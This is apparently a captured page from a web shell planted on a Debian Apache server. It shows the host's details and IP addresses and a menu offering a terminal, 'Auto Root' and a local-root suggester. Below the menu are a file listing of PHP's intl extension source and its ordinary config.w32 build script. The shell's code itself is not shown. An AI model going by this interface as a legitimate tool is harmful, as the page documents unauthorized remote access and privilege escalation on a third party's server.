Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.112
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
src /
php-7.4.33 /
ext /
intl /
Delete
Unzip
Name
Size
Permission
Date
Action
.libs
[ DIR ]
drwxr-xr-x
2024-03-12 14:27
breakiterator
[ DIR ]
drwxrwxr-x
2024-03-12 14:27
calendar
[ DIR ]
drwxrwxr-x
2024-03-12 14:27
collator
[ DIR ]
drwxrwxr-x
2024-03-12 14:26
common
[ DIR ]
drwxrwxr-x
2024-03-12 14:27
converter
[ DIR ]
drwxrwxr-x
2024-03-12 14:26
dateformat
[ DIR ]
drwxrwxr-x
2024-03-12 14:27
formatter
[ DIR ]
drwxrwxr-x
2024-03-12 14:26
grapheme
[ DIR ]
drwxrwxr-x
2024-03-12 14:27
idn
[ DIR ]
drwxrwxr-x
2024-03-12 14:27
locale
[ DIR ]
drwxrwxr-x
2024-03-12 14:26
msgformat
[ DIR ]
drwxrwxr-x
2024-03-12 14:27
normalizer
[ DIR ]
drwxrwxr-x
2024-03-12 14:26
resourcebundle
[ DIR ]
drwxrwxr-x
2024-03-12 14:27
spoofchecker
[ DIR ]
drwxrwxr-x
2024-03-12 14:27
tests
[ DIR ]
drwxrwxr-x
2022-10-31 11:36
timezone
[ DIR ]
drwxrwxr-x
2024-03-12 14:27
transliterator
[ DIR ]
drwxrwxr-x
2024-03-12 14:27
uchar
[ DIR ]
drwxrwxr-x
2024-03-12 14:27
CREDITS
119
B
-rw-rw-r--
2022-10-31 11:36
ERROR_CONVENTIONS.md
4.95
KB
-rw-rw-r--
2022-10-31 11:36
config.m4
4.05
KB
-rw-rw-r--
2022-10-31 11:36
config.w32
4.08
KB
-rw-rw-r--
2022-10-31 11:36
intl_common.h
1.83
KB
-rw-rw-r--
2022-10-31 11:36
intl_convert.c
4.94
KB
-rw-rw-r--
2022-10-31 11:36
intl_convert.h
1.38
KB
-rw-rw-r--
2022-10-31 11:36
intl_convert.lo
336
B
-rw-r--r--
2024-03-12 14:26
intl_convert.o
82.13
KB
-rw-r--r--
2024-03-12 14:26
intl_convertcpp.cpp
2.69
KB
-rw-rw-r--
2022-10-31 11:36
intl_convertcpp.h
1.37
KB
-rw-rw-r--
2022-10-31 11:36
intl_convertcpp.lo
345
B
-rw-r--r--
2024-03-12 14:27
intl_convertcpp.o
105.45
KB
-rw-r--r--
2024-03-12 14:27
intl_cppshims.h
1.3
KB
-rw-rw-r--
2022-10-31 11:36
intl_data.h
5.05
KB
-rw-rw-r--
2022-10-31 11:36
intl_error.c
7.81
KB
-rw-rw-r--
2022-10-31 11:36
intl_error.h
2.48
KB
-rw-rw-r--
2022-10-31 11:36
intl_error.lo
330
B
-rw-r--r--
2024-03-12 14:26
intl_error.o
122.49
KB
-rw-r--r--
2024-03-12 14:26
php_intl.c
34.19
KB
-rw-rw-r--
2022-10-31 11:36
php_intl.h
2.56
KB
-rw-rw-r--
2022-10-31 11:36
php_intl.lo
324
B
-rw-r--r--
2024-03-12 14:26
php_intl.o
167.44
KB
-rw-r--r--
2024-03-12 14:26
Save
Rename
// vim:ft=javascript ARG_ENABLE("intl", "Enable internationalization support", "no"); if (PHP_INTL != "no") { if (CHECK_LIB("icuuc.lib", "intl", PHP_INTL) && CHECK_HEADER_ADD_INCLUDE("unicode/utf.h", "CFLAGS_INTL")) { // always build as shared - zend_strtod.c/ICU type conflict EXTENSION("intl", "php_intl.c intl_convert.c intl_convertcpp.cpp intl_error.c ", true, "/I \"" + configure_module_dirname + "\" /DZEND_ENABLE_STATIC_TSRMLS_CACHE=1"); ADD_SOURCES(configure_module_dirname + "/collator", "\ collator.c \ collator_attr.c \ collator_class.c \ collator_compare.c \ collator_convert.c \ collator_create.c \ collator_error.c \ collator_is_numeric.c \ collator_locale.c \ collator_sort.c \ ", "intl"); ADD_SOURCES(configure_module_dirname + "/common", "\ common_error.c \ common_enum.cpp \ common_date.cpp \ ", "intl"); ADD_SOURCES(configure_module_dirname + "/converter", "\ converter.c \ ", "intl"); ADD_SOURCES(configure_module_dirname + "/formatter", "\ formatter.c \ formatter_attr.c \ formatter_class.c \ formatter_data.c \ formatter_format.c \ formatter_main.c \ formatter_parse.c \ ", "intl"); ADD_SOURCES(configure_module_dirname + "/locale", "\ locale.c \ locale_class.c \ locale_methods.c \ ", "intl"); ADD_SOURCES(configure_module_dirname + "/msgformat", "\ msgformat.c \ msgformat_attr.c \ msgformat_class.c \ msgformat_data.c \ msgformat_format.c \ msgformat_helpers.cpp \ msgformat_parse.c \ ", "intl"); ADD_SOURCES(configure_module_dirname + "/grapheme", "\ grapheme_string.c grapheme_util.c \ ", "intl"); ADD_SOURCES(configure_module_dirname + "/normalizer", "\ normalizer.c \ normalizer_class.c \ normalizer_normalize.c \ ", "intl"); ADD_SOURCES(configure_module_dirname + "/dateformat", "\ dateformat.c \ dateformat_class.c \ dateformat_attr.c \ dateformat_format.c \ dateformat_format_object.cpp \ dateformat_parse.c \ dateformat_data.c \ dateformat_attrcpp.cpp \ dateformat_helpers.cpp \ dateformat_create.cpp \ ", "intl"); ADD_SOURCES(configure_module_dirname + "/uchar", "\ uchar.c", "intl"); ADD_SOURCES(configure_module_dirname + "/idn", "\ idn.c", "intl"); ADD_SOURCES(configure_module_dirname + "/resourcebundle", "\ resourcebundle.c \ resourcebundle_class.c \ resourcebundle_iterator.c", "intl"); if (CHECK_HEADER_ADD_INCLUDE("unicode/uspoof.h", "CFLAGS_INTL")) { ADD_SOURCES(configure_module_dirname + "/spoofchecker", "\ spoofchecker.c \ spoofchecker_class.c \ spoofchecker_create.c \ spoofchecker_main.c", "intl"); } ADD_SOURCES(configure_module_dirname + "/transliterator", "\ transliterator.c \ transliterator_class.c \ transliterator_methods.c", "intl"); ADD_SOURCES(configure_module_dirname + "/timezone", "\ timezone_class.cpp \ timezone_methods.cpp", "intl"); ADD_SOURCES(configure_module_dirname + "/calendar", "\ calendar_methods.cpp \ gregoriancalendar_methods.cpp \ calendar_class.cpp", "intl"); ADD_SOURCES(configure_module_dirname + "/breakiterator", "\ breakiterator_class.cpp \ breakiterator_methods.cpp \ breakiterator_iterators.cpp \ rulebasedbreakiterator_methods.cpp \ codepointiterator_internal.cpp \ codepointiterator_methods.cpp ", "intl"); ADD_FLAG("LIBS_INTL", "icudt.lib icuin.lib icuio.lib"); /* Compat for ICU before 58.1.*/ if (CHECK_LIB("icule.lib", "intl", PHP_INTL)) { ADD_FLAG("LIBS_INTL", "icule.lib"); } if (CHECK_LIB("iculx.lib", "intl", PHP_INTL)) { ADD_FLAG("LIBS_INTL", "iculx.lib"); } ADD_FLAG("CFLAGS_INTL", "/EHsc /DUNISTR_FROM_CHAR_EXPLICIT=explicit /DUNISTR_FROM_STRING_EXPLICIT=explicit /DU_NO_DEFAULT_INCLUDE_UTF_HEADERS=1 /DU_HIDE_OBSOLETE_UTF_OLD_H=1"); AC_DEFINE("HAVE_INTL", 1, "Internationalization support enabled"); } else { WARNING("intl not enabled; libraries and/or headers not found"); } }